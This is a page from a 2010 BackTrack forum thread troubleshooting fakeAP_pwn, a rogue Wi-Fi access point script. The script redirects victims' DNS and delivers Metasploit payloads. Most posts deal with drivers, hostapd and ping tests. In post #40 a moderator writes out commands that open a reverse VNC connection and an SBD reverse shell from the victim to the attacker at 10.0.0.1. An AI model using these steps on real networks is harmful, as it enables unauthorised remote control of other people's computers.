Page 4 of 15 FirstFirst ... 2345614 ... LastLast
Results 31 to 40 of 144

Thread: [Script] [Video] fakeAP_pwn (v0.3)

  1. #31
    Good friend of the forums Eatme's Avatar
    Join Date
    Aug 2009
    Location
    Socks5
    Posts
    308

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by g0tmi1k View Post
    What IP does the targets get?
    Can you ping the fake AP? (10.0.0.1?)
    Can you ping google?
    Could you post the output from -d?
    My fakeAP_pwn Log:

    fakeAP_pwn.log
    Last edited by Eatme; 09-16-2010 at 03:47 PM.
    Wiffy-Auto-Cracker - was the best thing that ever happen to me. :) Wo0oT :)
    AWUSO36H_500mW_5dBi Antenna

  2. #32
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    17

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Are you using airbase-ng?
    What speed does the target download the payload?
    Firewalls?
    How long do you wait for?
    • Yes this is with airbase-ng, I havn't had any consistency problems with it at all like alot of these people.
    • No firewall on the windows 7 ultimate victim, and I shouldn't have to deal with a firewall in BT should I?
    • I'v done this quite a few times, I give it about 15 minutes until I give up
    • Download speed from victim is fast, the windows vnc payload takes ~1-2 seconds.


    Any ideas?

  3. #33
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by Eatme View Post
    My fakeAP_pwn Log:

    http://pastebin.com/5KLQMCTk]fakeAP_pwn.log[/url]
    Thanks! *Now we have a little idea what happening*

    Is it me, or that kernel doesn't look right? Sorry, I don't have BT4 any more to check.
    Linux eXe 2.6.30.9 #1 SMP Tue Dec 1 21:51:08 EST 2009 i686 GNU/Linux

    You're also not using the latest version
    Code:
    bash fakeAP_pwn.sh -u
    What about the ping test on the target to the attacker?
    Code:
    ping 10.0.0.100
    ping 10.0.0.1
    ping google.com
    *and on that note, what address does the target get?*

    Is the DNS redirection working?
    If you go to google.com, yahoo.com, aol.com, whateveryoulike.com does it force you to the attacker?
    *make sure to empty the cache*

    What speed does the target download the exploit?

    How far away is the target from the attacker?
    Have you...g0tmi1k?

  4. #34
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by joker5bb View Post
    you have to compile hostapd as follows below:
    Code:
    git clone git://w1.fi/srv/git/hostap.git
    cd hostap/hostapd
    
    # Copy the default config to .config for use during this build
    cp defconfig .config
    
    # Edit .config
    vi .config 
    
    #  you need to uncomment these lines, at a minimum
    # 
    #  CONFIG_DRIVER_NL80211=y
    #  LIBNL=/usr
    #  CFLAGS += -I$(LIBNL)/include
    #  LIBS += -L$(LIBNL)/lib
    
    make
    make install
    This has been added into the script (#108)
    After a couple of tries, I've FINALLY got hostapd working. *and it's worth it*

    I have tested it with 3 different WiFi Cards:
    Linksys WUSB54G (rt73usb) --- Works
    Alfa AWUS036H (rtl8187) --- Doesn't work
    Intel Link 5100 (iwlagn) --- Doesn't work
    *I would like to point out, all 3 of the above WiFi cards, works with airbase-ng*

    I'm just going to say a couple of things *HOPEFULLY* this will save a few posts...
    How do I check if my card will work with hostapd? Drivers - Linux Wireless
    How do I know what driver I'm using? Run, airmon-ng
    What if my driver isn't on the list? Try Google. (=
    My driver is on the list, but it says "No" in the "AP" column... Then your WiFi card isn't support and I don't think it's going to work...
    But it works for everything else... Well I don't think its going to work with this!
    But I can install hostapd... It doesn't mean it will work!
    But when I run it gives me...
    Code:
    nl80211: Failed to set interface wlan0 into AP mode
    nl80211 driver initialization failed.
     ELOOP: remaining socket: sock=4 eloop_data=0x98e...
    
    Yea, that's it not working because it's not supported
    Last edited by g0tmi1k; 09-16-2010 at 10:14 PM.
    Have you...g0tmi1k?

  5. #35
    Senior Member
    Join Date
    Jun 2007
    Location
    UK
    Posts
    175

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Hostapd now working thanks to Joker5bb and things feel more stable.
    My main problem now is that the victim can’t surf the net.
    I get a meterpreter session and can get a shell command working.
    Script set as sbd and is in transparent mode
    Can ping 10.0.0.1 & ping router
    If I try ping Google it answers 10.0.0.1
    browse 173.195.37.104 and google page shows
    browse Google fails to load
    Attacker can browse internet OK
    I guess it’s a DNS problem

    fakeAP_pwn.log
    Restoring apache~ls /etc/apache2/sites-available/ | xargs a2dissite fakeAP_pwn && a2ensite default* && a2dismod ssl && /etc/init.d/apache2 stop
    Stopping web server: apache2 ... waiting .
    Restoring apache~rm /etc/apache2/sites-available/fakeAP_pwn
    ~
    Many Thanks

  6. #36
    Good friend of the forums Eatme's Avatar
    Join Date
    Aug 2009
    Location
    Socks5
    Posts
    308

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by g0tmi1k View Post
    Thanks! *Now we have a little idea what happening*

    Is it me, or that kernel doesn't look right? Sorry, I don't have BT4 any more to check.


    You're also not using the latest version
    Code:
    bash fakeAP_pwn.sh -u

    What about the ping test on the target to the attacker?
    Code:
    ping 10.0.0.100
    ping 10.0.0.1
    ping google.com
    *and on that note, what address does the target get?*

    Is the DNS redirection working?
    If you go to google.com, yahoo.com, aol.com, whateveryoulike.com does it force you to the attacker?
    *make sure to empty the cache*

    What speed does the target download the exploit?

    How far away is the target from the attacker?
    1. Updating kernel as I type this. Will retry after I finish

    2. OK updated to #108

    3. Im doing this from the targets PC->
    Code:
    C:\Windows\system32>ping 10.0.0.100
    
    Pinging 10.0.0.100 with 32 bytes of data:
    Reply from 10.0.0.150: Destination host unreachable.
    Reply from 10.0.0.150: Destination host unreachable.
    Reply from 10.0.0.150: Destination host unreachable.
    
    Ping statistics for 10.0.0.100:
        Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),
    Control-C
    ^C
    C:\Windows\system32>ping 10.0.0.1
    
    Pinging 10.0.0.1 with 32 bytes of data:
    Reply from 10.0.0.1: bytes=32 time=17ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=5ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=12ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=985ms TTL=64
    
    Ping statistics for 10.0.0.1:
        Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
        Minimum = 5ms, Maximum = 985ms, Average = 254ms
    
    C:\Windows\system32>ping google.com
    
    Pinging google.com [10.0.0.1] with 32 bytes of data:
    Reply from 10.0.0.1: bytes=32 time=274ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=130ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=2747ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=140ms TTL=64
    
    Ping statistics for 10.0.0.1:
        Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
        Minimum = 130ms, Maximum = 2747ms, Average = 822ms
    *4. 10.0.0.150

    5. Yes DNS redirection is working. (whatever address 'www.test.com' I put in it goes to the update page)

    6. DL speed starts at 7.60 KB /s, then half way through it drops to about 333 bytes /s.

    7. I'm testing this on 1 computer atm.

    -my original OS as the "target" is Win7-Ult - same pc
    -As the attacker, I'm using Vmware-BT4 - same pc
    (Basically the same setup you did in your video if you did it on the same pc)
    Last edited by Eatme; 09-17-2010 at 12:21 AM.
    Wiffy-Auto-Cracker - was the best thing that ever happen to me. :) Wo0oT :)
    AWUSO36H_500mW_5dBi Antenna

  7. #37
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    to see if you can run hostapd with your card just run:
    Code:
    iw phy0 info
    and look if it has AP mode

  8. #38
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by Eatme View Post
    1. Updating kernel as I type this. Will retry after I finish

    2. OK updated to #108

    3. Im doing this from the targets PC->
    Code:
    C:\Windows\system32>ping 10.0.0.100
    
    Pinging 10.0.0.100 with 32 bytes of data:
    Reply from 10.0.0.150: Destination host unreachable.
    Reply from 10.0.0.150: Destination host unreachable.
    Reply from 10.0.0.150: Destination host unreachable.
    
    Ping statistics for 10.0.0.100:
        Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),
    Control-C
    ^C
    C:\Windows\system32>ping 10.0.0.1
    
    Pinging 10.0.0.1 with 32 bytes of data:
    Reply from 10.0.0.1: bytes=32 time=17ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=5ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=12ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=985ms TTL=64
    
    Ping statistics for 10.0.0.1:
        Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
        Minimum = 5ms, Maximum = 985ms, Average = 254ms
    
    C:\Windows\system32>ping google.com
    
    Pinging google.com [10.0.0.1] with 32 bytes of data:
    Reply from 10.0.0.1: bytes=32 time=274ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=130ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=2747ms TTL=64
    Reply from 10.0.0.1: bytes=32 time=140ms TTL=64
    
    Ping statistics for 10.0.0.1:
        Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
        Minimum = 130ms, Maximum = 2747ms, Average = 822ms
    *4. 10.0.0.150

    5. Yes DNS redirection is working. (whatever address 'www.test.com' I put in it goes to the update page)

    6. DL speed starts at 7.60 KB /s, then half way through it drops to about 333 bytes /s.

    7. I'm testing this on 1 computer atm.

    -my original OS as the "target" is Win7-Ult - same pc
    -As the attacker, I'm using Vmware-BT4 - same pc
    (Basically the same setup you did in your video if you did it on the same pc)
    1.) I dont think that is the source of the problem, but it cant hurt
    2.) Same thing in 108? and with the new kernal?
    3.) ... 10.0.0.100 was meant the answer of number 4.
    4.) No point in trying to ping this, as 10.0.0.1 is working.
    5.) Good.
    6.) ... right, this is where the problem could be! Your speed! Its "taking forever" for metasploit to upload. Why is it happening? Running in VM isn't a great idea... Or it's your hardware...or something else
    7.) I was asking due because of signal strenght! If your too far/close to each other its not going to work. For example, I couldn't use my laptop attacking my desktop if it was on the desk.



    Quote Originally Posted by joker5bb View Post
    to see if you can run hostapd with your card just run:
    Code:
    iw phy0 info
    and look if it has AP mode
    That works for me on ubuntu, doesn't work in BackTrack! *Using the same install method & WiFi card*
    Have you...g0tmi1k?

  9. #39
    Good friend of the forums Eatme's Avatar
    Join Date
    Aug 2009
    Location
    Socks5
    Posts
    308

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by g0tmi1k View Post
    1.) I dont think that is the source of the problem, but it cant hurt
    2.) Same thing in 108? and with the new kernal?
    3.) ... 10.0.0.100 was meant the answer of number 4.
    4.) No point in trying to ping this, as 10.0.0.1 is working.
    5.) Good.
    6.) ... right, this is where the problem could be! Your speed! Its "taking forever" for metasploit to upload. Why is it happening? Running in VM isn't a great idea... Or it's your hardware...or something else
    7.) I was asking due because of signal strenght! If your too far/close to each other its not going to work. For example, I couldn't use my laptop attacking my desktop if it was on the desk.




    That works for me on ubuntu, doesn't work in BackTrack! *Using the same install method & WiFi card*
    Oh OK, so being to close might be my problem then...

    I haven't tried it (108#) on the new kernel yet, I'm just finish installing it due to I had to re-install BT4 all together due to a noob mistake trying to install it.

    I'll run the script in about 15 min. and post details..Thanks
    Wiffy-Auto-Cracker - was the best thing that ever happen to me. :) Wo0oT :)
    AWUSO36H_500mW_5dBi Antenna

  10. #40
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    *** I didn't see these reply last night...***

    Quote Originally Posted by kernel831 View Post
    * Yes this is with airbase-ng, I havn't had any consistency problems with it at all like alot of these people.
    * No firewall on the windows 7 ultimate victim, and I shouldn't have to deal with a firewall in BT should I?
    * I'v done this quite a few times, I give it about 15 minutes until I give up
    * Download speed from victim is fast, the windows vnc payload takes ~1-2 seconds.
    Any ideas?
    What verion are you using? Try #108, then can you post the the report -d makes?
    Is it using the cache to download?
    Unless you have edited/chance something in backtrack - you shouldn't have a issue with firewalls...
    For the record, 5 minutes is too long
    What if you manually do some Metasploit-fu?
    What if you take manally tranfer either SBD or VNC accross, and run the commands
    Code:
    VNC
    copy winvnc.exe, vnchooks.dll, vnc.reg (from the $www folder) to C:\
    start -> run -> cmd
    regedit.exe /S C:\vnc.reg
    C:\winvnc.exe -kill -run
    C:\winvnc.exe -connect 10.0.0.1
    
    SBD
    copy sbd.exe (from the $www folder) to C:\
    start -> run -> cmd
    C:\sbd.exe -q -r 10 -k g0tmi1k -e cmd -p *WHATEVER PORT fakeAP_pwn says* 10.0.0.1
    maybe port scan 10.0.0.1 (from the target to the attacker)?



    Quote Originally Posted by parrotface View Post
    Hostapd now working thanks to Joker5bb and things feel more stable.
    My main problem now is that the victim can’t surf the net.
    I get a meterpreter session and can get a shell command working.
    Script set as sbd and is in transparent mode
    Can ping 10.0.0.1 & ping router
    If I try ping Google it answers 10.0.0.1
    browse 173.195.37.104 and google page shows
    browse Google fails to load
    Attacker can browse internet OK
    I guess it’s a DNS problem

    fakeAP_pwn.log
    Restoring apache~ls /etc/apache2/sites-available/ | xargs a2dissite fakeAP_pwn && a2ensite default* && a2dismod ssl && /etc/init.d/apache2 stop
    Stopping web server: apache2 ... waiting .
    Restoring apache~rm /etc/apache2/sites-available/fakeAP_pwn
    ~
    Many Thanks
    Does "normal" mode work okay? *got a feeling it will*
    On the target, try emptying the arp cache (arp -d *), as well as the firefox (?) cache.
    *thinking about it...I can remember having this problem at one stage*
    and yes, Apache stops after the infection. If you enable it again, instead of getting 404 errors, you will see the web server (again).
    Edit: Could you also try disconnecting, joining again after becoming "infected"?



    Quote Originally Posted by Eatme View Post
    Oh OK, so being to close might be my problem then...

    I haven't tried it (108#) on the new kernel yet, I'm just finish installing it due to I had to re-install BT4 all together due to a noob mistake trying to install it.

    I'll run the script in about 15 min. and post details..Thanks
    It was a issue for me! I had to unscrew the antenna of one of my WiFi cards...and the signal as still very strong! #108 has a lot of bug fixes and more of a detailed log file...worth trying!
    Last edited by g0tmi1k; 09-17-2010 at 10:37 AM.
    Have you...g0tmi1k?

Page 4 of 15 FirstFirst ... 2345614 ... LastLast

Similar Threads

  1. [Script][Video] EvilGrade (v0.1.1)
    By g0tmi1k in forum BackTrack Videos
    Replies: 27
    Last Post: 03-06-2011, 12:24 PM
  2. [Script] [Video] metasploit-FakeUpdate (v0.1.1)
    By g0tmi1k in forum BackTrack Videos
    Replies: 30
    Last Post: 12-06-2010, 04:53 PM
  3. [Script][Video] - Using McGrew Security's nbnspoof.py
    By orgcandman in forum Beginners Forum
    Replies: 3
    Last Post: 11-17-2010, 07:36 PM
  4. [Script] [Video] FakeAP_pwn (v0.2.1)
    By g0tmi1k in forum BackTrack Videos
    Replies: 184
    Last Post: 09-02-2010, 11:01 AM
  5. Replies: 10
    Last Post: 07-12-2010, 03:04 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •